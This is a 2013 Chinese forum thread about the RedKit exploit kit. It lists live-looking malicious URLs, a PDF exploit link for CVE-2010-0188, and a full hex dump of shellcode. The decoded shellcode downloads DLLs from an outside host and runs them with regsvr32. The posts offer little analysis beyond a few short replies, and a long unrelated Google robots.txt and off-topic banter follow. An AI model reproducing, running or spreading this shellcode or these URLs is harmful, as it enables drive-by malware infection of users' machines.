RedKit exploit kit

firefox3

bellsouthpwp.net/o/p/opinionated1/sun.html

1. http://denxc.com/987.pdf

复制代码

CVE-2010-0188


Shellcode¶

Hexadecimal ASCII
4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a
a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41
26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41
41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33
c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33
db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8
8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51
e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b
76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be
10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75
e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54
24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb
53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68
08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00
00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50
55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00
68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff
ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c
c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7
44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c
8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d
05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88
44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14
85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53
ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa
47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe
ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca
8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f
2f 64 65 6e 78 63 2e 63  6f 6d 2f 36 32 2e 68 74
6d 6c 00 00  L.`....J<.`..c.J
...J0..Jn/.JAAAA
&...............
.9.Jd.`.....AAAA
AAAAf......u4._3
.d.@0.@..p.V.v.3
.f.^<.t3,.......
.@0.F9.u..4$..uQ
..LQV.u<.t5x..V.
v...3.IA....3...
.8.t......@..;.u
.^.^$..f..K.F..T
$...........^Y..
S..h..}.3t.....h
...j.Y..........
..XPj@h....P...P
U...^......hon..
hurlmT........a.
.....r.......\$.
..$regs.D$.vr32.
D$..-s.Sh.....V.
..3.Q.D..wpbt.D.
..dll.D...Y...0.
D..AQj.j.SWj..V.
..u.j.S.V.j....S
.V........G.?.u.
G.?.u.j.j..V....
...N.......o..3.
.[..Fy6./phttp:/
/denxc.com/62.ht
ml..

m220011

重定向？
to

1. http://bestcom.sklep.pl/hagn.htm?i=852072

复制代码

firefox3

m220011 发表于 2013-1-6 15:34
重定向？
to

母鸡啊

m220011

firefox3 发表于 2013-1-6 15:49
母鸡啊

那你下面那段代码哪来的

firefox3

m220011 发表于 2013-1-6 15:53
那你下面那段代码哪来的

别人给我的，我就贴出来啦  老板

firefox3

m220011 发表于 2013-1-6 15:53
那你下面那段代码哪来的

htt  p:/
/denxc.com/62.ht
ml..

m220011

firefox3 发表于 2013-1-6 15:57
htt  p:/
/denxc.com/62.ht
ml..

蛋蛋
这个网址不需要解

wjhstu-VxG

User-agent: *
Disallow: /search
Disallow: /sdch
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Allow: /catalogs/about
Allow: /catalogs/p?
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow: /index.html?
Disallow: /?
Allow: /?hl=
Disallow: /?hl=*&
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /imgres
Disallow: /imglanding
Disallow: /sbd
Disallow: /keyword/
Disallow: /u/
Disallow: /univ/
Disallow: /cobrand
Disallow: /custom
Disallow: /advanced_group_search
Disallow: /googlesite
Disallow: /preferences
Disallow: /setprefs
Disallow: /swr
Disallow: /url
Disallow: /default
Disallow: /m?
Disallow: /m/?
Disallow: /m/blogs?
Disallow: /m/directions?
Disallow: /m/ig
Disallow: /m/images?
Disallow: /m/imgres?
Disallow: /m/local?
Disallow: /m/movies?
Disallow: /m/news?
Disallow: /m/news/i?
Disallow: /m/place?
Disallow: /m/products?
Disallow: /m/products/
Disallow: /m/setnewsprefs?
Disallow: /m/search?
Disallow: /m/swmloptin?
Disallow: /m/trends
Disallow: /m/video?
Disallow: /wml?
Disallow: /wml/?
Disallow: /wml/search?
Disallow: /xhtml?
Disallow: /xhtml/?
Disallow: /xhtml/search?
Disallow: /xml?
Disallow: /imode?
Disallow: /imode/?
Disallow: /imode/search?
Disallow: /jsky?
Disallow: /jsky/?
Disallow: /jsky/search?
Disallow: /pda?
Disallow: /pda/?
Disallow: /pda/search?
Disallow: /sprint_xhtml
Disallow: /sprint_wml
Disallow: /pqa
Disallow: /palm
Disallow: /gwt/
Disallow: /purchases
Disallow: /hws
Disallow: /bsd?
Disallow: /linux?
Disallow: /mac?
Disallow: /microsoft?
Disallow: /unclesam?
Disallow: /answers/search?q=
Disallow: /local?
Disallow: /local_url
Disallow: /shihui?
Disallow: /shihui/
Disallow: /froogle?
Disallow: /products?
Disallow: /products/
Disallow: /froogle_
Disallow: /product_
Disallow: /products_
Disallow: /products;
Disallow: /print
Disallow: /books/
Disallow: /bkshp?*q=*
Disallow: /books?*q=*
Disallow: /books?*output=*
Disallow: /books?*pg=*
Disallow: /books?*jtp=*
Disallow: /books?*jscmd=*
Disallow: /books?*buy=*
Disallow: /books?*zoom=*
Allow: /books?*q=related:*
Allow: /books?*q=editions:*
Allow: /books?*q=subject:*
Allow: /books/about
Allow: /booksrightsholders
Allow: /books?*zoom=1*
Allow: /books?*zoom=5*
Disallow: /ebooks/
Disallow: /ebooks?*q=*
Disallow: /ebooks?*output=*
Disallow: /ebooks?*pg=*
Disallow: /ebooks?*jscmd=*
Disallow: /ebooks?*buy=*
Disallow: /ebooks?*zoom=*
Allow: /ebooks?*q=related:*
Allow: /ebooks?*q=editions:*
Allow: /ebooks?*q=subject:*
Allow: /ebooks?*zoom=1*
Allow: /ebooks?*zoom=5*
Disallow: /patents?
Disallow: /patents/related/
Allow: /patents?id=
Allow: /patents?vid=
Disallow: /scholar
Disallow: /citations?
Allow: /citations?user=
Allow: /citations?view_op=new_profile
Allow: /citations?view_op=top_venues
Disallow: /complete
Disallow: /s?
Disallow: /sponsoredlinks
Disallow: /videosearch?
Disallow: /videopreview?
Disallow: /videoprograminfo?
Disallow: /maps?
Disallow: /mapstt?
Disallow: /mapslt?
Disallow: /maps/stk/
Disallow: /maps/br?
Disallow: /mapabcpoi?
Disallow: /maphp?
Disallow: /mapprint?
Disallow: /maps/api/js/StaticMapService.GetMapImage?
Disallow: /maps/api/staticmap?
Disallow: /mld?
Disallow: /staticmap?
Disallow: /places/
Allow: /places/$
Disallow: /maps/place
Disallow: /help/maps/streetview/partners/welcome/
Disallow: /help/maps/indoormaps/partners/
Disallow: /lochp?
Disallow: /center
Disallow: /ie?
Disallow: /sms/demo?
Disallow: /katrina?
Disallow: /blogsearch?
Disallow: /blogsearch/
Disallow: /blogsearch_feeds
Disallow: /advanced_blog_search
Disallow: /reader/
Allow: /reader/play
Disallow: /uds/
Disallow: /chart?
Disallow: /transit?
Disallow: /mbd?
Disallow: /extern_js/
Disallow: /calendar/feeds/
Disallow: /calendar/ical/
Disallow: /cl2/feeds/
Disallow: /cl2/ical/
Disallow: /coop/directory
Disallow: /coop/manage
Disallow: /trends?
Disallow: /trends/music?
Disallow: /trends/hottrends?
Disallow: /trends/viz?
Disallow: /notebook/search?
Disallow: /musica
Disallow: /musicad
Disallow: /musicas
Disallow: /musicl
Disallow: /musics
Disallow: /musicsearch
Disallow: /musicsp
Disallow: /musiclp
Disallow: /browsersync
Disallow: /call
Disallow: /archivesearch?
Disallow: /archivesearch/url
Disallow: /archivesearch/advanced_search
Disallow: /base/reportbadoffer
Disallow: /urchin_test/
Disallow: /movies?
Disallow: /codesearch?
Disallow: /codesearch/feeds/search?
Disallow: /wapsearch?
Disallow: /safebrowsing
Allow: /safebrowsing/diagnostic
Allow: /safebrowsing/report_badware/
Allow: /safebrowsing/report_error/
Allow: /safebrowsing/report_phish/
Disallow: /reviews/search?
Disallow: /orkut/albums
Allow: /jsapi
Disallow: /views?
Disallow: /c/
Disallow: /cbk
Allow: /cbk?output=tile&cb_client=maps_sv
Disallow: /recharge/dashboard/car
Disallow: /recharge/dashboard/static/
Disallow: /translate_a/
Disallow: /translate_c
Disallow: /translate_f
Disallow: /translate_static/
Disallow: /translate_suggestion
Disallow: /profiles/me
Allow: /profiles
Disallow: /s2/profiles/me
Allow: /s2/profiles
Allow: /s2/photos
Allow: /s2/static
Disallow: /s2
Allow: /s2/search/social
Disallow: /transconsole/portal/
Disallow: /gcc/
Disallow: /aclk
Disallow: /cse?
Disallow: /cse/home
Disallow: /cse/panel
Disallow: /cse/manage
Disallow: /tbproxy/
Disallow: /imesync/
Disallow: /shenghuo/search?
Disallow: /support/forum/search?
Disallow: /reviews/polls/
Disallow: /hosted/images/
Disallow: /ppob/?
Disallow: /ppob?
Disallow: /ig/add?
Disallow: /adwordsresellers
Disallow: /accounts/o8
Allow: /accounts/o8/id
Disallow: /topicsearch?q=
Disallow: /xfx7/
Disallow: /squared/api
Disallow: /squared/search
Disallow: /squared/table
Disallow: /toolkit/
Allow: /toolkit/*.html
Disallow: /globalmarketfinder/
Allow: /globalmarketfinder/*.html
Disallow: /qnasearch?
Disallow: /app/updates
Disallow: /sidewiki/entry/
Disallow: /quality_form?
Disallow: /labs/popgadget/search
Disallow: /buzz/post
Disallow: /compressiontest/
Disallow: /analytics/reporting/
Disallow: /analytics/admin/
Disallow: /analytics/web/
Disallow: /analytics/feeds/
Disallow: /analytics/settings/
Disallow: /alerts/
Disallow: /ads/preferences/
Allow: /ads/preferences/html/
Allow: /ads/preferences/plugin
Disallow: /ads/search
Disallow: /settings/ads/onweb/
Disallow: /phone/compare/?
Allow: /alerts/manage
Allow: /alerts/remove
Disallow: /travel/clk
Disallow: /hotelfinder/rpc
Disallow: /flights/rpc
Disallow: /commercesearch/services/
Disallow: /evaluation/
Disallow: /chrome/browser/mobile/tour
Disallow: /plus/history/tasks/
Disallow: /compare/*/apply*
Disallow: /forms/perks/
Disallow: /baraza/*/search
Disallow: /baraza/*/report
Disallow: /now/topics/
Sitemap: http://www.google.com/culturalinstitute/sitemap.xml
Sitemap: http://www.google.com/hostednews/sitemap_index.xml
Sitemap: http://www.google.com/sitemaps_webmasters.xml
Sitemap: http://www.google.com/ventures/sitemap_ventures.xml
Sitemap: http://www.gstatic.com/dictionar ... s/sitemap_index.xml
Sitemap: http://www.gstatic.com/earth/gallery/sitemaps/sitemap.xml
Sitemap: http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
Sitemap: http://www.gstatic.com/trends/websites/sitemaps/sitemapindex.xml

这是神马东西……火狐姐和mm很配

firefox3

wjhstu-VxG 发表于 2013-1-6 16:18
User-agent: *
Disallow: /search
Disallow: /sdch

MM漂亮不

wjhstu-VxG

firefox3 发表于 2013-1-6 16:20
MM漂亮不

……他是个纯爷们，和你的图片很配！